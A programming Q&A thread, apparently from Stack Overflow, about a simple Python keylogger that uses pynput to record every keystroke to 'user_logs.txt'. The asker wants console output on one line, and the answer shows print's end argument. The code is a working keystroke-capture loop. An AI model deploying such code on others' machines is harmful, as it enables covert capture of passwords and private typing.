# Is there a way that in the keylogging file ('user_logs.txt') that I CAN'T print on a new line everytime I type something?

Tags: python, windows, keylogger

In summary, the problem is that I don't want the keylogger to print a new line every single time in code.

I have tried using multiple methods from other users keyloggers such as the following: `str(key).replace("'", "")`. However, it does NOT work.

## libary

```
from pynput.keyboard import Key, Listener
import logging
import datetime
import sys
import inspect




def lineno():
    return inspect.currentframe().f_back.f_lineno

now = datetime.datetime.now()
```

## logs

```
log_dir = ""
logging.basicConfig(filename=(log_dir + "user_logs.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s:' )





def on_press(key):

    logging.info(str(key))

    #log info for computer screen

    print(lineno()),
    print(now),
    print(' INFO:'),
    print(key)


    str(key).replace("'", "")    


with Listener(on_press=on_press) as listener:
    listener.join()
```

I expected the output to print on the same line, however, it did nothing towards that.

Answer (score 0):

For Python 3.x, `print` takes another argument `end` to replace the newline at the end of `print`.

```
print(lineno(), end='')
print(now, end='')
print(' INFO:', end='')
print(key)
```

Alternatively, you can use string formatting.

```
print(f'{lineno()}{now} INFO:{key}')
```